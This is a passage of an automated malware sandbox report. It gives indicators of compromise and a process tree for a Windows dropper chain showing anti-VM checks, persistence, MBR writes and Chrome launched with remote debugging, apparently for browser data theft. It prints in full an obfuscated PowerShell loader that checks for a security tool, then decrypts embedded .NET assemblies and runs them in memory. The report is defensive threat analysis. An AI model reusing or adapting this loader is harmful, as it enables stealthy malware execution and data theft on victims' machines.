description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133844066173429205" chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5404 schtasks.exe 4688 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 888 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe 888 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe 1456 skotes.exe 1456 skotes.exe 1356 a4ed447d2f.exe 1356 a4ed447d2f.exe 1356 a4ed447d2f.exe 1356 a4ed447d2f.exe 5540 skotes.exe 5540 skotes.exe 4908 Bjkm5hE.exe 4908 Bjkm5hE.exe 4908 Bjkm5hE.exe 4908 Bjkm5hE.exe 740 Fe36XBk.exe 740 Fe36XBk.exe 6024 powershell.exe 6024 powershell.exe 5820 powershell.exe 5820 powershell.exe 3928 powershell.exe 3928 powershell.exe 888 ViGgA8C.exe 888 ViGgA8C.exe 1880 DTQCxXZ.exe 1880 DTQCxXZ.exe 1880 DTQCxXZ.exe 1880 DTQCxXZ.exe 888 ViGgA8C.exe 888 ViGgA8C.exe 888 ViGgA8C.exe 1584 d2YQIJa.exe 1584 d2YQIJa.exe 1584 d2YQIJa.exe 1584 d2YQIJa.exe 1584 d2YQIJa.exe 1584 d2YQIJa.exe 4912 skotes.exe 4912 skotes.exe 1044 sHN20me.exe 1044 sHN20me.exe 1044 sHN20me.exe 1044 sHN20me.exe 1044 sHN20me.exe 1044 sHN20me.exe 832 spoDnGT.exe 832 spoDnGT.exe 832 spoDnGT.exe 832 spoDnGT.exe 832 spoDnGT.exe 832 spoDnGT.exe 3732 Ta3ZyUR.exe 3732 Ta3ZyUR.exe 3732 Ta3ZyUR.exe 3732 Ta3ZyUR.exe 1916 qFqSpAp.exe 1916 qFqSpAp.exe 1916 qFqSpAp.exe 1916 qFqSpAp.exe 4312 BitLockerToGo.exe 4312 BitLockerToGo.exe 4312 BitLockerToGo.exe 4312 BitLockerToGo.exe 2984 m5UP2Yj.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
description pid Process Token: SeDebugPrivilege 6024 powershell.exe Token: SeDebugPrivilege 5820 powershell.exe Token: SeDebugPrivilege 3928 powershell.exe Token: SeDebugPrivilege 888 ViGgA8C.exe Token: SeDebugPrivilege 2612 C3hYpvm.exe Token: SeShutdownPrivilege 4180 chrome.exe Token: SeCreatePagefilePrivilege 4180 chrome.exe Token: SeShutdownPrivilege 4180 chrome.exe Token: SeCreatePagefilePrivilege 4180 chrome.exe Token: SeShutdownPrivilege 4180 chrome.exe Token: SeCreatePagefilePrivilege 4180 chrome.exe Token: SeShutdownPrivilege 4180 chrome.exe Token: SeCreatePagefilePrivilege 4180 chrome.exe Token: SeShutdownPrivilege 4180 chrome.exe Token: SeCreatePagefilePrivilege 4180 chrome.exe Token: SeShutdownPrivilege 4180 chrome.exe Token: SeCreatePagefilePrivilege 4180 chrome.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeShutdownPrivilege 4180 chrome.exe Token: SeCreatePagefilePrivilege 4180 chrome.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeDebugPrivilege 2456 powershell.exe Token: SeDebugPrivilege 3808 powershell.exe Token: SeDebugPrivilege 840 TempE0KPQGDQXDVXRETHIENMSL8050BNNGVH.EXE Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 4076 C3hYpvm.exe -
Suspicious use of FindShellTrayWindow 55 IoCs
pid Process 888 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 4180 chrome.exe 3040 433349306e.exe 3040 433349306e.exe 3040 433349306e.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe 4596 msedge.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3040 433349306e.exe 3040 433349306e.exe 3040 433349306e.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2612 C3hYpvm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 888 wrote to memory of 1456 888 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe 89 PID 888 wrote to memory of 1456 888 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe 89 PID 888 wrote to memory of 1456 888 5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe 89 PID 1456 wrote to memory of 4060 1456 skotes.exe 90 PID 1456 wrote to memory of 4060 1456 skotes.exe 90 PID 1456 wrote to memory of 4060 1456 skotes.exe 90 PID 4060 wrote to memory of 1356 4060 a4ed447d2f.exe 92 PID 4060 wrote to memory of 1356 4060 a4ed447d2f.exe 92 PID 4060 wrote to memory of 1356 4060 a4ed447d2f.exe 92 PID 4060 wrote to memory of 1356 4060 a4ed447d2f.exe 92 PID 4060 wrote to memory of 1356 4060 a4ed447d2f.exe 92 PID 4060 wrote to memory of 1356 4060 a4ed447d2f.exe 92 PID 4060 wrote to memory of 1356 4060 a4ed447d2f.exe 92 PID 4060 wrote to memory of 1356 4060 a4ed447d2f.exe 92 PID 4060 wrote to memory of 1356 4060 a4ed447d2f.exe 92 PID 1456 wrote to memory of 1088 1456 skotes.exe 99 PID 1456 wrote to memory of 1088 1456 skotes.exe 99 PID 1456 wrote to memory of 1088 1456 skotes.exe 99 PID 1456 wrote to memory of 5400 1456 skotes.exe 101 PID 1456 wrote to memory of 5400 1456 skotes.exe 101 PID 1456 wrote to memory of 5400 1456 skotes.exe 101 PID 1456 wrote to memory of 2552 1456 skotes.exe 102 PID 1456 wrote to memory of 2552 1456 skotes.exe 102 PID 1456 wrote to memory of 2552 1456 skotes.exe 102 PID 2552 wrote to memory of 4908 2552 Bjkm5hE.exe 103 PID 2552 wrote to memory of 4908 2552 Bjkm5hE.exe 103 PID 2552 wrote to memory of 4908 2552 Bjkm5hE.exe 103 PID 2552 wrote to memory of 4908 2552 Bjkm5hE.exe 103 PID 2552 wrote to memory of 4908 2552 Bjkm5hE.exe 103 PID 2552 wrote to memory of 4908 2552 Bjkm5hE.exe 103 PID 2552 wrote to memory of 4908 2552 Bjkm5hE.exe 103 PID 2552 wrote to memory of 4908 2552 Bjkm5hE.exe 103 PID 2552 wrote to memory of 4908 2552 Bjkm5hE.exe 103 PID 1456 wrote to memory of 740 1456 skotes.exe 106 PID 1456 wrote to memory of 740 1456 skotes.exe 106 PID 1456 wrote to memory of 740 1456 skotes.exe 106 PID 1456 wrote to memory of 6024 1456 skotes.exe 107 PID 1456 wrote to memory of 6024 1456 skotes.exe 107 PID 1456 wrote to memory of 6024 1456 skotes.exe 107 PID 6024 wrote to memory of 5076 6024 powershell.exe 109 PID 6024 wrote to memory of 5076 6024 powershell.exe 109 PID 6024 wrote to memory of 5076 6024 powershell.exe 109 PID 5076 wrote to memory of 1016 5076 cmd.exe 111 PID 5076 wrote to memory of 1016 5076 cmd.exe 111 PID 5076 wrote to memory of 1016 5076 cmd.exe 111 PID 5076 wrote to memory of 5820 5076 cmd.exe 112 PID 5076 wrote to memory of 5820 5076 cmd.exe 112 PID 5076 wrote to memory of 5820 5076 cmd.exe 112 PID 5820 wrote to memory of 3928 5820 powershell.exe 113 PID 5820 wrote to memory of 3928 5820 powershell.exe 113 PID 5820 wrote to memory of 3928 5820 powershell.exe 113 PID 1456 wrote to memory of 888 1456 skotes.exe 114 PID 1456 wrote to memory of 888 1456 skotes.exe 114 PID 1456 wrote to memory of 888 1456 skotes.exe 114 PID 1456 wrote to memory of 1880 1456 skotes.exe 116 PID 1456 wrote to memory of 1880 1456 skotes.exe 116 PID 1456 wrote to memory of 1880 1456 skotes.exe 116 PID 1088 wrote to memory of 4060 1088 13Z5sqy.exe 117 PID 1088 wrote to memory of 4060 1088 13Z5sqy.exe 117 PID 1088 wrote to memory of 4060 1088 13Z5sqy.exe 117 PID 1088 wrote to memory of 4060 1088 13Z5sqy.exe 117 PID 1088 wrote to memory of 4060 1088 13Z5sqy.exe 117 PID 1088 wrote to memory of 4060 1088 13Z5sqy.exe 117 PID 1088 wrote to memory of 4060 1088 13Z5sqy.exe 117
Processes
-
C:\Users\Admin\AppData\Local\Temp\5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe"C:\Users\Admin\AppData\Local\Temp\5227f1de1d5eeea6c87868992f6a1c8d71109bc9f28e2d48368eff17cd95efb7.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\1014060001\a4ed447d2f.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\a4ed447d2f.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Users\Admin\AppData\Local\Temp\1014060001\a4ed447d2f.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\a4ed447d2f.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 9684⤵
- Program crash
PID:4732
-
-
-
C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4060
-
-
-
C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5400
-
-
C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2552 -s 9684⤵
- Program crash
PID:6016
-
-
-
C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:740
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6024 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵
- System Location Discovery: System Language Discovery
PID:1016
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1880
-
-
C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1788 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4312
-
-
-
C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1584
-
-
C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1044
-
-
C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:832
-
-
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1156 -
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
PID:636
-
-
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 9724⤵
- Program crash
PID:4416
-
-
-
C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1916
-
-
C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2984 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 14524⤵
- Program crash
PID:5856
-
-
-
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5276 -
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"4⤵
- Executes dropped EXE
PID:2072
-
-
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:1764 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4180 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xe4,0x104,0x7ffdfcfecc40,0x7ffdfcfecc4c,0x7ffdfcfecc586⤵PID:4996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2056,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1924 /prefetch:26⤵PID:3092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1868,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2088 /prefetch:36⤵PID:5580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2032 /prefetch:86⤵PID:4380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3188 /prefetch:16⤵
- Uses browser remote debugging
PID:4960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:16⤵
- Uses browser remote debugging
PID:5960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4268 /prefetch:16⤵
- Uses browser remote debugging
PID:2476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4668,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4660 /prefetch:86⤵PID:3556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4800 /prefetch:86⤵PID:1524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4788,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4828 /prefetch:86⤵PID:4672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4952,i,15301269000035548898,14261945233694234937,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4704 /prefetch:86⤵PID:3748
-
-
-
